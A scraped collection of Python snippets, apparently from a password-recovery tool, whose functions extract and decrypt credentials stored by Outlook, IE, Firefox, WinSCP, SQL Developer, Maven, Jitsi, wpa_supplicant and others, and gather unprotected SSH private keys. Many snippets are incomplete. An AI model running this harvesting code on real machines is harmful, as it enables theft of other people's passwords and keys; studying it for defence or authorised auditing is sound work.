					if len(values) != 0:
						pwdFound.append(values)

		print_output("Outlook", pwdFound)
Exemple #27
	def run(self):
		"""Report the login stored in the Kalypso Media Launcher ini file.

		Reads ``launcher.ini`` below ``%APPDATA%``, base64-decodes the
		``password`` option of the ``styx user`` section and passes it to
		``self.xorstring`` with the fixed key defined below.

		Review note: the stored password is protected only by base64 plus a
		constant key embedded in this code; ``config.get`` raises when the
		section or an option is missing.
		"""
		Header().title_info('Kalypso Media Launcher')
		key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89'

		if 'APPDATA' not in os.environ:
			print_debug('ERROR', 'The APPDATA environment variable is not defined.')
			return
		inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini'

		# The actual user details are stored in *.userdata files
		if not os.path.exists(inifile):
			print_debug('INFO', 'The Kalypso Media Launcher doesn\'t appear to be installed.')
			return

		config = ConfigParser.ConfigParser()
		config.read(inifile)

		login = config.get('styx user','login')
		cookedpw = base64.b64decode(config.get('styx user','password'))
		entry = {'Login': login, 'Password': self.xorstring(cookedpw, key)}

		print_output("Kalypso Media Launcher", [entry])

					
				
Exemple #28
	def get_creds(self):
		"""Return the result of ``win32cred.CredEnumerate(None, 0)``.

		Any exception is logged at DEBUG level and turned into ``None``.
		"""
		try:
			return win32cred.CredEnumerate(None, 0)
		except Exception as e:
			print_debug('DEBUG', '{0}'.format(e))
		return None
Exemple #29
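    def extract_repositories_credentials(self):
        """
        Extract all repositories's credentials.

        Reads ``<USERPROFILE>\\.m2\\settings.xml`` and, for every ``server``
        node, keeps the child elements whose tag (namespace removed) is listed
        in ``self.nodes_to_extract``.

        See https://maven.apache.org/settings.html#Servers

        :return: List of dict in which one dict contains all information for a repository.
                 Empty when USERPROFILE is unset, the file is missing or parsing fails.
        """
        repos_creds = []
        user_profile = os.environ.get("USERPROFILE")
        if user_profile is None:
            # The original concatenated None with a str here, raising
            # TypeError outside the try block below.
            return repos_creds

        maven_settings_file_location = user_profile + "\\.m2\\settings.xml"
        if not os.path.isfile(maven_settings_file_location):
            return repos_creds

        try:
            settings = ET.parse(maven_settings_file_location).getroot()
            server_nodes = settings.findall(".//%sserver" % self.settings_namespace)
            for server_node in server_nodes:
                creds = {}
                for child_node in server_node:
                    tag_name = child_node.tag.replace(self.settings_namespace, "")
                    if tag_name in self.nodes_to_extract:
                        # NOTE(review): an empty element has text None; the
                        # resulting AttributeError ends the whole parse.
                        creds[tag_name] = child_node.text.strip()
                if len(creds) > 0:
                    repos_creds.append(creds)
        except Exception as e:
            print_debug("ERROR", "Cannot retrieve repositories credentials '%s'" % e)

        return repos_creds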
Exemple #30
    def extract_private_keys_unprotected(self):
        """
        Extract all DSA/RSA private keys that are not protected with a passphrase.

        Walks ``self.key_files_location`` (following symbolic links), reads each
        regular file completely and keeps the content of those that contain a
        DSA or RSA private-key marker and pass ``is_private_key_unprotected``.

        :return: List of encoded key (key file content)
        """
        unprotected = []
        if not isdir(self.key_files_location):
            return unprotected

        for dirpath, _dirnames, filenames in walk(self.key_files_location, followlinks=True):
            for filename in filenames:
                key_file_path = join(dirpath, filename)
                if not isfile(key_file_path):
                    continue
                try:
                    # Read encoded content of the key
                    with open(key_file_path, "r") as key_file:
                        key_content_encoded = key_file.read()

                    # The marker text decides which algorithm is tried; files
                    # without either marker are skipped.
                    if "DSA PRIVATE KEY" in key_content_encoded:
                        key_algorithm = "DSA"
                    elif "RSA PRIVATE KEY" in key_content_encoded:
                        key_algorithm = "RSA"
                    else:
                        continue

                    # Keep the key only if it loads without a passphrase
                    if self.is_private_key_unprotected(key_content_encoded, key_algorithm):
                        unprotected.append(key_content_encoded)
                except Exception as e:
                    print_debug("ERROR", "Cannot load key file '%s' '%s'" % (key_file_path, e))

        return unprotected
Exemple #31
    def is_private_key_unprotected(self, key_content_encoded, key_algorithm):
        """
        Check if the private key can be loaded without specifying any passphrase.

        PyCrypto >= 2.6.1 required in order to have the method importKey() in DSA class.

        :param key_content_encoded: Encoded content of the private key to test
        :param key_algorithm: Algorithm of the key ("RSA" selects RSA, anything else DSA)
        :return: True only if the key can be successfuly loaded and is usable
        """
        try:
            # Loading without a passphrase is the actual test.
            key_module = RSA if key_algorithm == "RSA" else DSA
            key = key_module.importKey(key_content_encoded)
            # Usable means: loaded, able to sign, and holding the private part.
            return (key is not None and key.can_sign() and key.has_private())
        except Exception as e:
            print_debug("ERROR", "Cannot validate key protection '%s'" % e)
            return False
Exemple #32
	def run(self, historic=''):
		"""Match stored Internet Explorer form entries against URL hashes.

		Writes the helper binary, optionally reads extra URLs from the text
		file ``historic``, builds a hash table with ``self.get_hash_table`` and
		compares it with the value names of the IntelliForms 'Storage2' key.
		Each match is passed to ``self.decipher_password``.

		Review notes:
		- ``pwdFound`` is not defined in this method; presumably it is a
		  module-level name filled elsewhere - confirm.
		- The file opened for ``historic`` is never closed.
		- ``list`` shadows the builtin; both bare ``except`` clauses hide the
		  actual error.
		"""
		# print title
		Header().title_debug('Internet Explorer')
		
		# write the binary file
		try:
			self.write_binary_file()
		except:
			# Only logged: the run continues even though the file is missing.
			print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name)
		
		list = []
		if historic:
			if os.path.exists(historic):
				# One entry per line, surrounding whitespace stripped.
				f = open(historic, 'r')
				for line in f:
					list.append(line.strip())
			else:
				print_debug('WARNING', 'The text file %s does not exist' % historic)
		
		# retrieve the urls from the history
		hash_tables = self.get_hash_table(list)
		
		# open the registry
		accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
		keyPath = 'Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2'
		
		failed = False
		try:
			hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
		except:
			failed = True
		
		nb_site = 0
		nb_pass_found = 0 
		if failed == False:
			# Index 1 of RegQueryInfoKey is used as the number of values to enumerate.
			num = win32api.RegQueryInfoKey(hkey)[1]
			for x in range(0, num):
				k = win32api.RegEnumValue(hkey, x)
				if k:
					nb_site +=1
					for h in hash_tables:
						# both hash are similar, we can decipher the password
						# (the first 40 characters of the value name, lowercased, are compared)
						if h[1] == k[0][:40].lower():
							nb_pass_found += 1
							cipher_text = k[1]
							self.decipher_password(cipher_text, h[0])
							break
			
			# print the results
			print_output("Internet Explorer", pwdFound)
			
			# manage errors
			if nb_site == 0:
				print_debug('INFO', 'No credentials stored in the IE browser.')
			elif nb_site > nb_pass_found:
				print_debug('ERROR', '%s hashes have not been decrypted, the associate website used to decrypt the passwords has not been found' % str(nb_site - nb_pass_found))
			
		else:
			print_debug('INFO', 'No password stored.\nThe registry key storing the ie password has not been found.\nKey: %s' % keyPath)
Exemple #33
	def check_winscp_installed(self):
		"""Return True when the WinSCP 'Configuration\\Security' key can be opened.

		The key is looked up under HKEY_CURRENT_USER with read access; any
		failure is logged at DEBUG level and reported as ``False``.
		"""
		accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
		try:
			# Only the ability to open the key matters; the handle is not kept.
			win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0, accessRead)
		except Exception as e:
			print_debug('DEBUG', '{0}'.format(e))
			return False
		return True
Exemple #34
 def initialize_libnss(self, list_libnss, profile):
     """Load the first library of ``list_libnss`` whose ``NSS_Init(profile)`` returns 0.

     Returns ``True`` on the first success and ``None`` when no candidate
     works.  ``self.libnss`` keeps the last library that could be loaded,
     even if its initialisation failed.
     """
     for candidate in list_libnss:
         try:
             self.libnss = CDLL(candidate)
             initialised = self.libnss.NSS_Init(profile) == 0
         except Exception as e:
             print_debug('DEBUG', '{0}'.format(e))
             continue
         if initialised:
             return True
Exemple #35
	def initialize_libnss(self, list_libnss, profile):
		"""Load the first library of ``list_libnss`` whose ``NSS_Init(profile)`` returns 0.

		Returns ``True`` on the first success and ``None`` when no candidate
		works.  ``self.libnss`` keeps the last library that could be loaded,
		even if its initialisation failed.
		"""
		for candidate in list_libnss:
			try:
				self.libnss = CDLL(candidate)
				initialised = self.libnss.NSS_Init(profile) == 0
			except Exception as e:
				print_debug('DEBUG', '{0}'.format(e))
				continue
			if initialised:
				return True
Exemple #36
	def get_infos(self, path, passphrase, salt):
		"""Report the connections stored in SQL Developer's connections.xml.

		The first entry of ``path`` whose name starts with
		'o.jdeveloper.db.connection' is entered, then ``connections.xml`` is
		parsed.  Elements carrying an ``addrType`` attribute fill a dict; the
		``password`` element is passed through ``self.decrypt`` and a ``driver``
		element adds the dict to the result.

		NOTE(review): one single dict is reused for the whole file, so every
		list entry refers to the same object and shows the values read last.
		"""
		for entry in os.listdir(path):
			if entry.startswith('o.jdeveloper.db.connection'):
				path += os.sep + entry
				break

		xml_file = path + os.sep + 'connections.xml'
		if not os.path.exists(xml_file):
			print_debug('ERROR', 'The xml file connections.xml containing the passwords has not been found.')
			return

		# addrType values that are copied as they are, with their output key.
		plain_fields = {
			'sid': 'sid',
			'port': 'port',
			'user': 'user',
			'ConnName': 'Connection Name',
			'customUrl': 'custom Url',
			'SavePassword': 'SavePassword',
			'hostname': 'hostname',
		}

		tree = ET.ElementTree(file=xml_file)
		pwdFound = []
		values = {}
		for elem in tree.iter():
			if 'addrType' not in elem.attrib.keys():
				continue
			addr_type = elem.attrib['addrType']

			if addr_type in plain_fields:
				for child in elem.getchildren():
					values[plain_fields[addr_type]] = child.text

			elif addr_type == 'password':
				for child in elem.getchildren():
					values['password'] = self.decrypt(salt, child.text, passphrase)

			elif addr_type == 'driver':
				for child in elem.getchildren():
					values['driver'] = child.text
					# The driver element closes one connection record.
					pwdFound.append(values)

		# print the results
		print_output("SQL Developer", pwdFound)
Exemple #37
	def get_infos(self, path, passphrase, salt):
		"""Collect connection settings from SQL Developer's connections.xml and print them.

		The first entry of ``path`` whose name starts with
		'o.jdeveloper.db.connection' is appended to ``path``, and
		connections.xml is read from the resulting directory. Elements that
		carry an ``addrType`` attribute are copied into one dict; the
		'password' value is handed to self.decrypt(salt, text, passphrase)
		(helper not shown). The record is appended when a 'driver' element is
		seen, and the list is passed to print_output. Nothing is returned.

		Because the stored password is recovered from the file plus the
		passphrase and salt supplied by the caller, connections.xml should be
		treated as a secret and its read access restricted.
		"""
		for entry in os.listdir(path):
			if entry.startswith('o.jdeveloper.db.connection'):
				path = path + os.sep + entry
				break

		xml_file = path + os.sep + 'connections.xml'
		if not os.path.exists(xml_file):
			print_debug('ERROR', 'The xml file connections.xml containing the passwords has not been found.')
			return

		# addrType value -> key in the output record, for values copied verbatim
		copied_fields = {
			'sid': 'sid',
			'port': 'port',
			'user': 'user',
			'ConnName': 'Connection Name',
			'customUrl': 'custom Url',
			'SavePassword': 'SavePassword',
			'hostname': 'hostname',
		}

		tree = ET.ElementTree(file=xml_file)
		pwdFound = []
		# NOTE(review): a single dict is reused for every connection, so each
		# entry appended below is the same object.
		values = {}
		for elem in tree.iter():
			if 'addrType' not in elem.attrib:
				continue

			kind = elem.attrib['addrType']
			if kind in copied_fields:
				label = copied_fields[kind]
				for child in elem.getchildren():
					values[label] = child.text

			elif kind == 'password':
				for child in elem.getchildren():
					values['password'] = self.decrypt(salt, child.text, passphrase)

			elif kind == 'driver':
				for child in elem.getchildren():
					values['driver'] = child.text
					# 'driver' closes a record: emit what has been gathered
					pwdFound.append(values)

		# print the results
		print_output("SQL Developer", pwdFound)
Exemple #38
	def parse_file(self):
		"""Open the file named by self.filestr for parsing.

		In the part of the method shown here, a failed open is logged at
		DEBUG (exception text) and INFO (file name); ``fd`` stays None in
		that case.
		"""
		pwdFound = []
		fd = None

		try:
			fd = open(self.filestr)
		except Exception as e:
			print_debug('DEBUG', '{0}'.format(e))
			print_debug('INFO', 'Could not open the file: %s ' % self.filestr)
Exemple #39
	def retrieve_password(self):
		"""Print the module banner and read FTP Navigator's Ftplist.txt when it exists.

		The file is looked up at a fixed location on C:. When it is missing,
		an INFO message is logged and nothing else happens.
		"""
		Header().title_debug('FTP Navigator')

		ftplist = "C:\\FTP Navigator\\Ftplist.txt"
		if not os.path.exists(ftplist):
			print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % ftplist)
			return

		self.read_file(ftplist)
Exemple #40
    def parse_file(self):
        """Open the file named by self.filestr for parsing.

        In the part of the method shown here, a failed open is logged at
        DEBUG (exception text) and INFO (file name); ``fd`` stays None in
        that case.
        """
        pwdFound = []
        fd = None

        try:
            fd = open(self.filestr)
        except Exception as e:
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('INFO', 'Could not open the file: %s ' % self.filestr)
Exemple #41
 def get_logins_info(self):
     """Open WinSCP's per-user Sessions registry key for reading.

     The key is opened under HKEY_CURRENT_USER with read, enumerate and
     query access. When the open fails, the exception text is logged at
     DEBUG and False is returned.
     """
     sessions_key = r'Software\Martin Prikryl\WinSCP 2\Sessions'
     accessRead = (win32con.KEY_READ
                   | win32con.KEY_ENUMERATE_SUB_KEYS
                   | win32con.KEY_QUERY_VALUE)
     try:
         key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, sessions_key, 0, accessRead)
     except Exception as e:
         print_debug('DEBUG', '{0}'.format(e))
         return False
Exemple #42
	def retrieve_password(self):
		"""Print the module banner and process the Jitsi properties file when one is found.

		self.get_path() returns either the sentinel 'JITSI_NOT_EXISTS', which
		is logged at INFO, or a value that is passed on to self.get_info().
		"""
		Header().title_debug('Jitsi')

		file_properties = self.get_path()
		if file_properties != 'JITSI_NOT_EXISTS':
			self.get_info(file_properties)
			return

		print_debug('INFO', 'Jitsi not installed.')
Exemple #43
    def run(self):
        """Print the module banner and process the Jitsi properties file when one is found.

        self.get_path() returns either the sentinel 'JITSI_NOT_EXISTS', which
        is logged at INFO, or a value that is passed on to self.get_info().
        """
        Header().title_info('Jitsi')

        file_properties = self.get_path()
        if file_properties != 'JITSI_NOT_EXISTS':
            self.get_info(file_properties)
            return

        print_debug('INFO', 'Jitsi not installed.')
Exemple #44
	def run(self, historic=''):
		"""Print the module banner, then write the helper binary to disk.

		In the part of the method shown here, a failure of
		self.write_binary_file() is logged at DEBUG with the exception text
		and at ERROR with the module-level ``dll_name``. ``historic`` is not
		used in this part.
		"""
		Header().title_info('Internet Explorer')

		# This step creates a file on disk (named by dll_name, per the error
		# text below), so it needs write permission at the target location.
		try:
			self.write_binary_file()
		except Exception as e:
			print_debug('DEBUG', '{0}'.format(e))
			failure_text = '%s cannot be created, check your file permission' % dll_name
			print_debug('ERROR', failure_text)
Exemple #45
    def run(self):
        """Print the module banner and locate the Puttycm default database.

        When self.get_default_database() raises, the exception text is logged
        at DEBUG, 'Puttycm not installed' at INFO, and the method returns.
        """
        Header().title_info('Puttycm')

        try:
            database_path = self.get_default_database()
        except Exception as e:
            # Any failure of the lookup is reported as "not installed".
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('INFO', 'Puttycm not installed')
            return
Exemple #46
def rev2self():
    """End impersonation and release the handle kept in ``global_ref``.

    Calls advapi32 RevertToSelf, closes the handle stored in the module-level
    ``global_ref`` when it is not None (presumably the impersonated token;
    confirm against the code that sets it), resets ``global_ref`` to None and
    logs the account name reported by GetUserName().
    """
    global global_ref
    # NOTE(review): the result of RevertToSelf is not checked. If the call
    # fails, execution continues in the impersonated context; the
    # 'Running as' line logged below is the only visible indication.
    windll.advapi32.RevertToSelf()
    try:
        if global_ref is not None:
            windll.kernel32.CloseHandle(global_ref)
    except:
        # Best-effort cleanup: every error raised while closing is ignored.
        pass
    global_ref=None
    print_debug('INFO', 'Running as: ' + GetUserName())
Exemple #47
 def check_winscp_installed(self):
     """Report whether WinSCP's per-user Configuration/Security registry key can be opened.

     Returns True when the key under HKEY_CURRENT_USER opens with read,
     enumerate and query access; returns False after logging the
     exception text at DEBUG when the open fails.
     """
     wanted_access = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
     security_key = r'Software\Martin Prikryl\WinSCP 2\Configuration\Security'
     try:
         # The handle is not used afterwards; a successful open is the signal.
         win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, security_key, 0, wanted_access)
     except Exception as e:
         print_debug('DEBUG', '{0}'.format(e))
         return False
     return True
Exemple #48
    def run(self, historic=''):
        """Print the module banner, then write the helper binary to disk.

        In the part of the method shown here, a failure of
        self.write_binary_file() is logged at DEBUG with the exception text
        and at ERROR with the module-level ``dll_name``. ``historic`` is not
        used in this part.
        """
        Header().title_info('Internet Explorer')

        # This step creates a file on disk (named by dll_name, per the error
        # text below), so it needs write permission at the target location.
        try:
            self.write_binary_file()
        except Exception as e:
            print_debug('DEBUG', '{0}'.format(e))
            failure_text = '%s cannot be created, check your file permission' % dll_name
            print_debug('ERROR', failure_text)
Exemple #49
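    def readBsddb(self, name):
        """Read a Berkeley DB 1.85 hash file into a dict.

        The 60-byte header is checked for magic 0x61561 and version 2. Pages
        are then walked using the page size (header offset 12) and the key
        count (header offset 0x38), both taken from the file itself.

        Args:
            name: path of the database file; it is opened in binary mode.

        Returns:
            A dict built from consecutive pairs of chunks read from the
            pages, keyed by the second chunk of each pair, or False when the
            magic number or the version does not match.
        """
        # Format reference: http://download.oracle.com/berkeley-db/db.1.85.tar.gz
        db1 = []

        # The context manager releases the handle on the early "return False"
        # paths and on exceptions as well as on normal completion.
        with open(name, 'rb') as f:
            header = f.read(4 * 15)
            magic = self.getLongBE(header, 0)
            if magic != 0x61561:
                print_debug('WARNING', 'Bad magic number')
                return False
            version = self.getLongBE(header, 4)
            if version != 2:
                print_debug('WARNING', 'Bad version !=2 (1.85)')
                return False
            pagesize = self.getLongBE(header, 12)
            nkeys = self.getLongBE(header, 0x38)

            readkeys = 0
            page = 1
            while readkeys < nkeys:
                f.seek(pagesize * page)
                offsets = f.read((nkeys + 1) * 4 + 2)
                offsetVals = []
                i = 0
                nval = 0
                val = 1
                keys = 0
                # NOTE(review): this loop ends only when the offsets read from
                # the file make nval equal val. Nothing here bounds it against
                # len(offsets), so on a malformed file it relies on the
                # getShortLE helper (not shown) to raise.
                while nval != val:
                    keys += 1
                    key = self.getShortLE(offsets, 2 + i)
                    val = self.getShortLE(offsets, 4 + i)
                    nval = self.getShortLE(offsets, 8 + i)
                    offsetVals.append(key + pagesize * page)
                    offsetVals.append(val + pagesize * page)
                    readkeys += 1
                    i += 4
                # End-of-page sentinel so the last chunk has an upper bound.
                offsetVals.append(pagesize * (page + 1))
                valKey = sorted(offsetVals)
                for i in range(keys * 2):
                    f.seek(valKey[i])
                    data = f.read(valKey[i + 1] - valKey[i])
                    db1.append(data)
                page += 1

        # Chunks were collected pairwise; the second of each pair is the key.
        db = {}
        for i in range(0, len(db1), 2):
            db[db1[i + 1]] = db1[i]

        return db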
Exemple #50
    def run(self):
        """Print the module banner and output what self.parse_file() returns.

        The method returns early when self.check_file_access() is truthy, and
        again (with an INFO message) when the process is not running as
        uid 0. Otherwise the parse result is passed to print_output under
        the label "wpa_supplicant".
        """
        Header().title_info('Wifi (from WPA Supplicant)')

        if self.check_file_access():
            return

        # The remaining steps are only attempted as root.
        running_as_root = os.getuid() == 0
        if not running_as_root:
            print_debug('INFO', 'You need more privileges (run it with sudo)\n')
            return

        print_output("wpa_supplicant", self.parse_file())
Exemple #51
    def history_from_regedit(self):
        """Open the current user's Internet Explorer TypedURLs registry key.

        The key is opened under HKEY_CURRENT_USER with read, enumerate and
        query access. When the open fails, the exception text is logged at
        DEBUG and an empty list is returned.
        """
        urls = []

        keyPath = 'Software\\Microsoft\\Internet Explorer\\TypedURLs'
        accessRead = (win32con.KEY_READ
                      | win32con.KEY_ENUMERATE_SUB_KEYS
                      | win32con.KEY_QUERY_VALUE)

        try:
            hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
        except Exception as e:
            print_debug('DEBUG', '{0}'.format(e))
            return []
Exemple #52
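    def get_path(self, software_name):
        """Return the per-user data directory of a Mozilla application.

        Args:
            software_name: 'Firefox' or 'Thunderbird'.

        Returns:
            The APPDATA value followed by ``\\Mozilla\\Firefox`` or
            ``\\Thunderbird``, or None when APPDATA is not set or the name is
            not one of the two handled here.
        """
        if 'APPDATA' not in os.environ:
            # print_debug is called as (level, message) elsewhere in this
            # file; the level argument was missing from this call.
            print_debug(
                'ERROR',
                'The APPDATA environment variable is not definded.\nUse the -s option and specify the folder path of the victim\nPath: <HOMEPATH>\\Application Data\\Mozilla\\Firefox\\Profiles\\<PROFILE_NAME>'
            )
            return None

        appdata = str(os.environ['APPDATA'])
        if software_name == 'Firefox':
            return '%s\\Mozilla\\Firefox' % appdata
        if software_name == 'Thunderbird':
            return '%s\\Thunderbird' % appdata

        # Any other name used to reach "return path" with path unbound and
        # raise UnboundLocalError; report "no path" instead.
        return None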
Exemple #53
    def get_hash_table(self, list):
        """Build [encoded_url, sha1_hex] pairs for the history URLs plus ``list``.

        Each URL gets a trailing NUL, is encoded as UTF-16LE and hashed with
        SHA-1; the lower-case hex digest is stored next to the encoded bytes.
        A URL that fails to encode or hash is logged at DEBUG and skipped.

        Args:
            list: extra URLs appended after those from self.get_history().
        """
        # history entries first, caller-supplied URLs after them
        urls = self.get_history() + list

        hash_tables = []
        for url in urls:
            try:
                h = (url + '\0').encode('UTF-16LE')
                digest = hashlib.sha1(h).hexdigest().lower()
                hash_tables.append([h, digest])
            except Exception as e:
                print_debug('DEBUG', '{0}'.format(e))
Exemple #54
	def get_dic_file(self, dictionary_path):
		"""Load a word list from ``dictionary_path``, one entry per line.

		Trailing newline characters are stripped from each line. When the
		file cannot be opened, the exception text is logged at DEBUG, an
		ERROR message names the path, and [] is returned. The listing shown
		here ends after the file is closed, before any other return.
		"""
		words = []
		if dictionary_path:
			try:
				dicFile = open(dictionary_path, 'r')
			except Exception as e:
				print_debug('DEBUG', '{0}'.format(e))
				print_debug('ERROR', 'Unable to open passwords file: %s' % str(dictionary_path))
				return []

			words.extend(line.strip('\n') for line in dicFile.readlines())
			dicFile.close()
Exemple #55
	def run(self):
		"""Print the module banner and process DbVisualizer's settings when it is installed.

		self.get_mainPath() returns either the sentinel 'DBVIS_NOT_EXISTS',
		which is logged at INFO, or a path. In the second case the passphrase
		and salt are fetched, in that order, and handed to self.get_infos()
		together with the path.
		"""
		Header().title_debug('DbVisualizer')

		mainPath = self.get_mainPath()
		if mainPath == 'DBVIS_NOT_EXISTS':
			print_debug('INFO', 'DbVisualizer not installed.')
			return

		passphrase = self.get_passphrase()
		salt = self.get_salt()
		self.get_infos(mainPath, passphrase, salt)
Exemple #56
    def run(self):
        """Print the module banner and process the Jitsi properties file when one is found.

        self.get_path() returns 'Error' (logged at ERROR: APPDATA is not
        defined), 'JITSI_NOT_EXISTS' (logged at INFO), or a value that is
        passed on to self.get_info().
        """
        Header().title_info('Jitsi')

        file_properties = self.get_path()

        if file_properties == 'Error':
            print_debug('ERROR', 'The APPDATA environment variable is not defined')
            return

        if file_properties == 'JITSI_NOT_EXISTS':
            print_debug('INFO', 'Jitsi not installed.')
            return

        self.get_info(file_properties)
Exemple #57
    def masterPasswordUsed(self, path):

        # the init file is not well defined so lines have to be removed before to parse it
        cp = RawConfigParser()
        f = open(path + os.sep + 'operaprefs.ini', 'rb')

        f.readline()  # discard first line
        while 1:
            try:
                cp.readfp(f)
                break
            except Exception, e:
                print_debug('DEBUG', '{0}'.format(e))
                f.readline()  # discard first line